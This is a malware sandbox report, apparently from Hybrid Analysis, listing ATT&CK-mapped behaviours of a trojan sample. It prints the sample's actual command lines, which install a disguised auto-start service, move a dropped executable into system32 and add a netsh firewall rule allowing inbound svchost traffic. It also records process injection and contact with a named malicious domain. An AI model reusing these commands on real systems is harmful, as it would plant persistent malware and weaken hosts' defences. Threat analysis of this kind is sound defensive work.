{"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"jwifylqa.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002632)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005392)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005392)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00002632)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00003100)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000aeab16b7173e00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000de2db767ba33b7670000000000000000\" - (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jwifylqa.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"jwifylqa.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"4261d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"917244\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005392)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005392)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"jwifylqa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\QMUELFHL\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jwifylqa.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jwifylqa.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"jwifylqa.exe.67B73C09.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"jwifylqa.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\jwifylqa.exe]- [targetUID: 00000000-00002632]\n \"JWIFYLQA.EXE.67B73C0A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has section name .text with entropy \"6.63010280368\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has section name .text with entropy \"7.97285529131\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has section name .reloc with entropy \"6.22149605003\"\n \"jwifylqa.exe\" has section name .text with entropy \"6.63010280368\"\n \"jwifylqa.exe\" has section name .text with entropy \"7.97285529131\"\n \"jwifylqa.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00002632)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (UID: 00000000-00002632)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00003100)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jwifylqa.exe\" %WINDIR%\\\\system32\\\\qmuelfhl\\\\\" (UID: 00000000-00004684)\n Spawned process \"sc.exe\" with commandline \"create qmuelfhl binPath= \"%WINDIR%\\\\system32\\\\qmuelfhl\\\\jwifylqa.exe /d\\\\\"C:\\\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00002932)\n Spawned process \"sc.exe\" with commandline \"description qmuelfhl \"wifi internet conection\"\" (UID: 00000000-00002356)\n Spawned process \"sc.exe\" with commandline \"start qmuelfhl\" (UID: 00000000-00001072)\n Spawned process \"jwifylqa.exe\" with commandline \"/d\"C:\\\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\"\" (UID: 00000000-00003564)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005392)\n Spawned process \"svchost.exe\" (UID: 00000000-00005312)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 468)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 468)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 468)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 584)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 584)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 584)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 564)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 564)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 564)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 148)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 148)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 148)\n \"jwifylqa.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"jwifylqa.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"jwifylqa.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"jwifylqa.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" allocated memory in \"C:\\9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"jwifylqa.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00003564)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"jwifylqa.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start qmuelfhl\" (UID: 00000000-00001072)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005392)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d
https://hybrid-analysis.com/sample/2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d
Hybrid Analysis - Um_unhooking
{"size": 9329512, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d", "sha256": "2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d", "av_detect": 73, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates": [{"owner": "CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US", "issuer": "CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "e9b188ef9d02de7efdb50e20840185a", "md5": "8D:DD:0B:C6:D9:D7:70:EB:6B:2B:67:1A:86:28:55:CC", "sha1": "A9:9D:5B:79:E9:F1:CD:A5:9C:DA:B6:37:31:69:D5:35:3F:58:74:C6", "valid_from": "2022-08-01T00:00:00+00:00", "valid_until": "2031-11-09T23:59:59+00:00"}, {"owner": "CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US", "issuer": "CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "59b1b579e8e2132e23907bda777755c", "md5": "78:F2:FC:AA:60:1F:2F:B4:EB:C9:37:BA:53:2E:75:49", "sha1": 